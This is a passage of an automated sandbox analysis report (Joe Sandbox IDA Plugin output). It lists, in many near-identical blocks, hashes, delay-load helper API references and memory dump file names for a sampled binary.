                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 911656a5e0797ca3861948601da196b01bc880021e2c4a7adae9f3a4bdff4fa3
                    • Instruction ID: 646f76655311c56cb61a687d50b5f8ee65c2e3f7e74a6b947e48a09f61e92ce2
                    • Opcode Fuzzy Hash: 911656a5e0797ca3861948601da196b01bc880021e2c4a7adae9f3a4bdff4fa3
                    • Instruction Fuzzy Hash: 39B0128327C002BD320451152C47E3A01DCC0C4B10330C0FEF418C5091D8409C441135
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: a0df1e9c1229f9bf0d2f03b247946627a5ac220ab4c300861991ed45a303704d
                    • Instruction ID: 5aef70c08f297572aa42af1b0793a0e0687b2004fed9dace1001a61d2aae26f0
                    • Opcode Fuzzy Hash: a0df1e9c1229f9bf0d2f03b247946627a5ac220ab4c300861991ed45a303704d
                    • Instruction Fuzzy Hash: DFB0128326C2027D335851192C8BF3601CCC4C0B10330C9FEF018C0041D4405CC00035
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: a7b02067e86c69c2bc5ecc34edf3cef19d66bb233280c3937cad488361d90952
                    • Instruction ID: aaa95c9d973cdbf9d3590089c30d4ff23d0c8dfcc20e9ec10be69209cf687d9f
                    • Opcode Fuzzy Hash: a7b02067e86c69c2bc5ecc34edf3cef19d66bb233280c3937cad488361d90952
                    • Instruction Fuzzy Hash: C9B0128326C1027D321851192C8BF3A01CCC4C0B10330C4FEF418C5041D4405C840035
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: bd16280a2d36d769a1cb0fbc4110baadc67a9c917362b1f81593160fdc5edc44
                    • Instruction ID: 0e6a4982ab8ce5132f3cd42d6e79a62d627325f5413736b292e8cf509d03c2d1
                    • Opcode Fuzzy Hash: bd16280a2d36d769a1cb0fbc4110baadc67a9c917362b1f81593160fdc5edc44
                    • Instruction Fuzzy Hash: 77B0128326C1027D3208511A2D8BF3601CCC4C0B10330C4FEF028C4041D4805D810035
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 745958a0b68e4e52248df0bc9b983bd7b3b76a8af3d55f8986112ea8b3bb0fb9
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: 745958a0b68e4e52248df0bc9b983bd7b3b76a8af3d55f8986112ea8b3bb0fb9
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 98e43cdde6bf5da7add97e2085bea6aea86d0a9cd9e48b6e7ed04ca4aaeb98a8
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: 98e43cdde6bf5da7add97e2085bea6aea86d0a9cd9e48b6e7ed04ca4aaeb98a8
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 8523e274aaa34e1f82690d009efd59f63a46a65f4c1d76339ed1e6702425fdc5
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: 8523e274aaa34e1f82690d009efd59f63a46a65f4c1d76339ed1e6702425fdc5
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 3329bccb84ca4aefcd11c125a8092ccca6e39ebebf29c022954e24cfade2ce84
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: 3329bccb84ca4aefcd11c125a8092ccca6e39ebebf29c022954e24cfade2ce84
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 653d54b2602761462b6c02fde87dde393c4adaeebb41b42e723715b20192bbef
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: 653d54b2602761462b6c02fde87dde393c4adaeebb41b42e723715b20192bbef
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 189ce7583d85122aab86106ee1126d2efde49b2c3282b872aad7d327e576a5f9
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: 189ce7583d85122aab86106ee1126d2efde49b2c3282b872aad7d327e576a5f9
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: b5c40d308b0451e7ad7e71cd1d69914dec91676f93f9feceaffce26465d9ffcf
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: b5c40d308b0451e7ad7e71cd1d69914dec91676f93f9feceaffce26465d9ffcf
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e3cd55a78214266f28fde5868b2a4fe7bf36b77c792d422e3f5193014afe6687
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: e3cd55a78214266f28fde5868b2a4fe7bf36b77c792d422e3f5193014afe6687
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e27efad56ef5bbcfa5cbc186f71a543c021ed86c9f5c39fb215a9a3c8bc62af4
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: e27efad56ef5bbcfa5cbc186f71a543c021ed86c9f5c39fb215a9a3c8bc62af4
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: ccbfd57b668ae0885a58718e30d26a48d27a196bca4952339136ef8902ca988f
                    • Instruction ID: 8200b8366c588e781efd0e480a30925938254574f28b7c3876ba964e71079dd2
                    • Opcode Fuzzy Hash: ccbfd57b668ae0885a58718e30d26a48d27a196bca4952339136ef8902ca988f
                    • Instruction Fuzzy Hash: E6A001962A9103BD7A48A2626D9BD3A06ADC9C4B61331C9FEF52A85092A8805C466439
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 8e804f184633c87d13f6f5c12a6de0312b494af43068dedd20d7e92de901bc94
                    • Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
                    • Opcode Fuzzy Hash: 8e804f184633c87d13f6f5c12a6de0312b494af43068dedd20d7e92de901bc94
                    • Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 934999eddce744bd76cd8a0fd7b0126a80fae1cace6df1efd208dc3d58b738c3
                    • Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
                    • Opcode Fuzzy Hash: 934999eddce744bd76cd8a0fd7b0126a80fae1cace6df1efd208dc3d58b738c3
                    • Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: ae835c2ad6560cc240d7d2661f18349146d784389f9cc38552272caff58512f5
                    • Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
                    • Opcode Fuzzy Hash: ae835c2ad6560cc240d7d2661f18349146d784389f9cc38552272caff58512f5
                    • Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
